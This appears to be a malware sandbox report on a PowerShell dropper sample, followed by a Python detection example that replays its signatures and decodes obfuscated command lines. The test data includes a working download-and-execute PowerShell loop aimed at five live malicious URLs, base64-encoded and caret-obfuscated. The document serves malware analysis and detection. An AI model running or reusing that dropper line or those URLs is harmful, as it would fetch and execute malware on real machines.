General

  • Target

    6178dc6d2ae04bda0f998dbca1564824_JaffaCakes118

  • Size

    268KB

  • Sample

    240521-ax1qracd77

  • MD5

    6178dc6d2ae04bda0f998dbca1564824

  • SHA1

    55a31711c9849b8a72dc36e591734227707b7e79

  • SHA256

    d7610008f1f0825a0d6e0eba01ac358d9f553c19db572c42622b2c2e520331a9

  • SHA512

    bb663146795c30788becf3cc086fbe091aa93eb0e7e755a4669260dec501f0aea556b2cffef6edbfd0b14e384a4fc1b82128dcc533301dd6650b093480870f65

  • SSDEEP

    6144:dlHdw7fKygopeaLRcoWXTXx3E/tgDVtZ:dBazKyqaLRcTTX1E/0zZ

Score
10/10

Malware Config

  • Extracted

    Language: ps1
    Deobfuscated

  • URLs (exe.dropper)

    http://hockeystickz.com/XE6LOJ
    http://jeffweeksphotography.com/7mHSXX
    http://hellcatshockey.org/k
    http://gsverwelius.nl/7Sf68C7x
    http://aile.pub/KmKEymIK

Targets

    • Target

      6178dc6d2ae04bda0f998dbca1564824_JaffaCakes118

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    • An obfuscated cmd.exe command-line is typically used to evade detection.
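
As an added example (not code from the Triage report or its signature engine), the following Python replays the three signatures listed above over constructed Sysmon-style process-creation events and recovers the dropper's URL list from an obfuscated command line. The parent/child process sets, the event field names, the process IDs and the sample command line are assumptions made for the example; only the five URLs come from the extracted config above.

```python
"""Replay the three sandbox signatures above over constructed process-creation
events and recover the dropper's URL list from the obfuscated command line.
Added example code, not part of the Triage report or its signature engine."""
import base64
import re

# Parents that have no business spawning a command interpreter (assumed list).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "acrord32.exe"}
# Stand-in for the sandbox's "blocklisted process" set (assumed, not Triage's real list).
BLOCKLISTED = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe",
               "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}
URL_RE = re.compile(r"https?://[^\s'\"<>;,)]+", re.I)
# powershell.exe accepts any unambiguous prefix of -EncodedCommand; -e/-ec/-enc are the usual ones.
ENC_RE = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def deobfuscate_cmdline(cmdline):
    """Undo what cmd.exe and powershell.exe undo at runtime: caret escapes and
    -EncodedCommand (base64 of UTF-16LE). Returns the raw text plus any decoded payload."""
    text = cmdline.replace("^", "")  # simplified: cmd.exe drops escape carets before execution
    for m in ENC_RE.finditer(text):
        try:
            payload = base64.b64decode(m.group(1)).decode("utf-16le")
        except (ValueError, UnicodeDecodeError):
            continue  # not a real encoded command; keep the text as-is
        text += " " + payload
    return text


def obfuscation_indicators(cmdline):
    """Cheap syntactic tells that a command line was built to dodge string matching."""
    ind = []
    if cmdline.count("^") >= 3:
        ind.append("caret-escaping")
    if ENC_RE.search(cmdline.replace("^", "")):
        ind.append("encoded-command")
    if re.search(r"'\s*\+\s*'", cmdline):
        ind.append("string-concatenation")
    if re.search(r"%\w+:~\d+,\d+%", cmdline):
        ind.append("env-var-substring")
    return ind


def triage(events):
    """Return one finding per event that trips a rule or yields a URL."""
    findings = []
    for ev in events:
        parent, child = basename(ev["ParentImage"]), basename(ev["Image"])
        raw = ev["CommandLine"]
        hits = []
        if parent in OFFICE_PARENTS and child in BLOCKLISTED:
            hits.append("unexpected-child-process")
        if child in BLOCKLISTED and ev.get("NetworkConnect"):
            hits.append("blocklisted-process-network")
        ind = obfuscation_indicators(raw)
        if ind:
            hits.append("obfuscated-cmdline:" + ",".join(ind))
        urls = URL_RE.findall(deobfuscate_cmdline(raw))
        if hits or urls:
            findings.append({"pid": ev["ProcessId"], "signatures": hits, "urls": urls})
    return findings


# Constructed sample events (assumed shape and values, NOT the real sample's command line):
# Word spawns cmd.exe with a caret-mangled "powershell", which runs an encoded
# download-and-execute loop over the five payload URLs from the extracted config.
_DROPPER_PS = (
    "$u='http://hockeystickz.com/XE6LOJ,http://jeffweeksphotography.com/7mHSXX,"
    "http://hellcatshockey.org/k,http://gsverwelius.nl/7Sf68C7x,http://aile.pub/KmKEymIK'.Split(',');"
    "$p=$env:TEMP+'\\'+(Get-Random)+'.exe';"
    "foreach($x in $u){try{(New-Object Net.WebClient).DownloadFile($x,$p);Start-Process $p;break}catch{}}"
)
_ENC = base64.b64encode(_DROPPER_PS.encode("utf-16le")).decode("ascii")
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\cmd.exe", "NetworkConnect": False,
     "CommandLine": "cmd /c p^o^w^e^r^s^h^e^l^l -NoP -w hidden -enc " + _ENC},
    {"ProcessId": 4188, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "NetworkConnect": True,
     "CommandLine": "powershell -NoP -w hidden -enc " + _ENC},
    {"ProcessId": 5204, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe", "NetworkConnect": False,
     "CommandLine": "notepad.exe"},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f["pid"], f["signatures"])
        for u in f["urls"]:
            print("   ", u)
```

The URL extraction runs on the decoded text rather than the raw command line, which is the point: a blocklist of raw strings never sees the caret-split "powershell" or the base64 payload, while the parent/child rule fires on process lineage alone and needs no decoding at all.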

MITRE ATT&CK Enterprise v15

Tasks